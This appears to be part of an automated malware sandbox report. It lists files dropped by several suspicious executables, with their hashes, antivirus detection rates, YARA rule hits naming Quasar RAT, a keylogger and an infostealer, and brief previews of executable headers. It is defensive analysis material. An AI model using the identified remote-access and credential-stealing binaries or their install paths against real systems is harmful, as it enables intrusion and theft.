                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...W"%c...............$......%................@.............................`&.....B.&...`... ...............................................&......@&......p%..8...........P&.............................@:%.(.....................&.0............................text...(...........................`.P`.data.....!..0....!.................@.`..rdata..0P....%..R....$.............@.`@.pdata...8...p%..:...D%.............@.0@.xdata...1....%..2...~%.............@.0@.bss..........%.......................`..idata........&.......%.............@.0..CRT....x.... &.......%.............@.@..tls.........0&.......%.............@.@..rsrc........@&.......%.............@.0..reloc.......P&.......%.............@.0B........................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\gfiKDLgr58thy4d.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2874368
                                                                  Entropy (8bit):6.538348251167646
                                                                  Encrypted:false
                                                                  SSDEEP:49152:NIKC+8eUs/UMBF1XX5QmZLPa16xzqD6Kdaf3DTOWzYuloalhHg4e:NlC+i0bBHXGgjaQx+OhfzTxzdloaD
                                                                  MD5:952F360A4651F948BE3A673178631641
                                                                  SHA1:60E58B89CFCE587AA121BAF431D55CBBECD21545
                                                                  SHA-256:A92133787AF66E6D68A301EF087E4116F5CAB3F538D8EC5E5E0EB95CECC68EA8
                                                                  SHA-512:AF346587C95AC9E120CE63D46B22992E3AB69702AF602EA6D7A16C3DCF9D2F7F19903233646CEF8153AA877F5773C486DB504EA6534BCBC3B136BD07B62483D0
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                  Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....L"f.........."..........H+.....@..........@.............................@,...........`.................................................0...<.............,..............0,.x...............................(.......8..............X............................text...f........................... ..`.rdata........... ..................@..@.data...`0+...... +.................@....pdata........,.......+.............@..@.00cfg........,.......+.............@..@.tls......... ,.......+.............@....reloc..x....0,.......+.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\F4R5fd8grr.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):1281
                                                                  Entropy (8bit):5.370111951859942
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                  MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                  SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                  SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                  SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.34726597513537405
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlll:Nll
                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                  Malicious:false
                                                                  Preview:@...e...........................................................
                                                                  Process:C:\Users\user\Desktop\GR55Qg1hth.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):335360
                                                                  Entropy (8bit):7.548086611496671
                                                                  Encrypted:false
                                                                  SSDEEP:6144:RBx7z3Bre16M01nguKBmmlbvx0zKGkl5EiCtuhNjtANJ4tDWhRaitlopYR:RnBreIfKNJVZotuhNZKxrYpI
                                                                  MD5:DA87A0A2ABA605908BF8B9A3F4377481
                                                                  SHA1:5CAC4EA0B3F0CC2D7C04655DB12AD0443CBAA5CF
                                                                  SHA-256:22EE7B8104599B47313195598FFC34AAFD6A6552DCCE0E7B3232CED3A90AC9A4
                                                                  SHA-512:55A8A27A013CB2C3DEDA81779D89AB956A5F57D00A155496ABC7BF3C5A87F3B7C41058AB3681CBBD0406F69EA01C4FFC3E5779C2CA676088A68CB87F19C34C28
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                                  Joe Sandbox View:
                                                                  • Filename: Installer.exe, Detection: malicious, Browse
                                                                  • Filename: softwareinstaller.exe, Detection: malicious, Browse
                                                                  • Filename: N2wufLmC74.exe, Detection: malicious, Browse
                                                                  • Filename: setup.exe, Detection: malicious, Browse
                                                                  • Filename: hZDPlQwZ9D.exe, Detection: malicious, Browse
                                                                  • Filename: cfBJlHsOsz.exe, Detection: malicious, Browse
                                                                  • Filename: FKN6uh7y01.exe, Detection: malicious, Browse
                                                                  • Filename: 6iWK0k820U.exe, Detection: malicious, Browse
                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                  • Filename: Loader.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$..........;..eh..eh..eh.fi..eh.`iS.eh..`i..eh..ai..eh..fi..eh.ai..eh.di..eh..dhE.eh^.li..eh^..h..eh...h..eh^.gi..ehRich..eh........PE..d......b.........."..........n......D..........@.............................`............`..................................................e..P...............(............P..d....Q..p............................P..@...............x............................text...0........................... ..`.rdata.............................@..@.data...X....p.......`..............@....pdata..(............l..............@..@_RDATA..\............|..............@..@.rsrc................~..............@..@.reloc..d....P......................@..B........................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\Desktop\F4R5fd8grr.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):514048
                                                                  Entropy (8bit):6.158808864589808
                                                                  Encrypted:false
                                                                  SSDEEP:6144:tTEgdc0YNX7IxUpGREWve13+7LOUs6f6YMZlfdwcEysb8F92tw+gcTR3O:tTEgdfYWxUkQ61yeC3gtLgcdO
                                                                  MD5:EA001F076677C9B0DD774AE670EFDF63
                                                                  SHA1:37A4466F3C38B60A30FC1073B9D0B2D2D0E692E5
                                                                  SHA-256:19FD26FA3F76141CC05EF0C0C96EA91DCF900E760B57195F216A113B1CF69100
                                                                  SHA-512:6D634F47C0901E18CB159732C0CA1E7E6C930D16B18D0DAEA717C252EC7DDD37E90745B69512313DBBDAC9099059B6F7CBE07044A71B36231C027818810C8652
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Joe Security
                                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Florian Roth
                                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Florian Roth
                                                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: ditekshen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.^............................~.... ........@.. .......................@............@.................................(...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`.......H.......L................................................................0..M....... ....(.....(...........s....(....(...........s....o....(.....(....s....(....*....0..8.......(....(.....s....%.o....%.o....%.o....(....&..&...(.....*........--..........00.......0..@........o....,7(....(.....s....%.o....%.o....%.o....(....&..&...(.....*........-5..........08......f~....,.~....(....(....*.*v.(.....s....}.....s....}....*r..(......(.....(......(....*....0..L........{....r...po....
                                                                  Process:C:\Users\user\Desktop\5fr5gthkjdg71.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):514048
                                                                  Entropy (8bit):6.158808864589808
                                                                  Encrypted:false
                                                                  SSDEEP:6144:tTEgdc0YNX7IxUpGREWve13+7LOUs6f6YMZlfdwcEysb8F92tw+gcTR3O:tTEgdfYWxUkQ61yeC3gtLgcdO
                                                                  MD5:EA001F076677C9B0DD774AE670EFDF63
                                                                  SHA1:37A4466F3C38B60A30FC1073B9D0B2D2D0E692E5
                                                                  SHA-256:19FD26FA3F76141CC05EF0C0C96EA91DCF900E760B57195F216A113B1CF69100
                                                                  SHA-512:6D634F47C0901E18CB159732C0CA1E7E6C930D16B18D0DAEA717C252EC7DDD37E90745B69512313DBBDAC9099059B6F7CBE07044A71B36231C027818810C8652
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Joe Security
                                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Florian Roth
                                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Florian Roth
                                                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: ditekshen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.^............................~.... ........@.. .......................@............@.................................(...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`.......H.......L................................................................0..M....... ....(.....(...........s....(....(...........s....o....(.....(....s....(....*....0..8.......(....(.....s....%.o....%.o....%.o....(....&..&...(.....*........--..........00.......0..@........o....,7(....(.....s....%.o....%.o....%.o....(....&..&...(.....*........-5..........08......f~....,.~....(....(....*.*v.(.....s....}.....s....}....*r..(......(.....(......(....*....0..L........{....r...po....
                                                                  Process:C:\Users\user\Desktop\5fr5gthkjdg71.exe
                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2479616
                                                                  Entropy (8bit):7.887568215394881
                                                                  Encrypted:false
                                                                  SSDEEP:49152:4elUnBKWqx6g25uMThhswijSEGQpETFkNL:45BKtxo5fQIwuhk
                                                                  MD5:8E40252356A6FB3F8F52D1EFFA2C2C3C
                                                                  SHA1:3BF5461B591A53DCB48EA2DC6535CD90AA786C4E
                                                                  SHA-256:DE83DD82DA3EBAA2C09FD75A7307AD5E2031AD8C911CD75753FFEF3EB1571F0A
                                                                  SHA-512:C3286845AA20F9BF06BFBCCB63C12A72ED223FC054881A66B643F55F81AA0DF868C28199090CAB6D37552B268615DC0605587A85F0D4EC6EE6D5ED25A5739A2A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...W"%c...............$......%................@.............................`&.....B.&...`... ...............................................&......@&......p%..8...........P&.............................@:%.(.....................&.0............................text...(...........................`.P`.data.....!..0....!.................@.`..rdata..0P....%..R....$.............@.`@.pdata...8...p%..:...D%.............@.0@.xdata...1....%..2...~%.............@.0@.bss..........%.......................`..idata........&.......%.............@.0..CRT....x.... &.......%.............@.@..tls.........0&.......%.............@.@..rsrc........@&.......%.............@.0..reloc.......P&.......%.............@.0B........................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\5fr5gthkjdg71.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2874368
                                                                  Entropy (8bit):6.538348251167646
                                                                  Encrypted:false
                                                                  SSDEEP:49152:NIKC+8eUs/UMBF1XX5QmZLPa16xzqD6Kdaf3DTOWzYuloalhHg4e:NlC+i0bBHXGgjaQx+OhfzTxzdloaD
                                                                  MD5:952F360A4651F948BE3A673178631641
                                                                  SHA1:60E58B89CFCE587AA121BAF431D55CBBECD21545
                                                                  SHA-256:A92133787AF66E6D68A301EF087E4116F5CAB3F538D8EC5E5E0EB95CECC68EA8
                                                                  SHA-512:AF346587C95AC9E120CE63D46B22992E3AB69702AF602EA6D7A16C3DCF9D2F7F19903233646CEF8153AA877F5773C486DB504EA6534BCBC3B136BD07B62483D0
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                  Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....L"f.........."..........H+.....@..........@.............................@,...........`.................................................0...<.............,..............0,.x...............................(.......8..............X............................text...f........................... ..`.rdata........... ..................@..@.data...`0+...... +.................@....pdata........,.......+.............@..@.00cfg........,.......+.............@..@.tls......... ,.......+.............@....reloc..x....0,.......+.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1510207563435464
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlllulpl/lz:NllUpl/
                                                                  MD5:DFE4744F578FF94A0B3378C24D7C626F
                                                                  SHA1:7A733F5674EA7740F3C3BBD286B40868D923E771
                                                                  SHA-256:507F96B627FC9392C8F926A2CCA0AC78618D26FAAFDF2C08121E2CEAA7097AC1
                                                                  SHA-512:418A50E5C3ACF50D8307707E98E1DA726B3F56903A077ADA8A3E631FE97AF6310384517C9E66C6E6ADE8F0E34D08558C62AA0082AFF674136CE86C25C5C7DE30
                                                                  Malicious:false
                                                                  Preview:@...e................................................@..........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
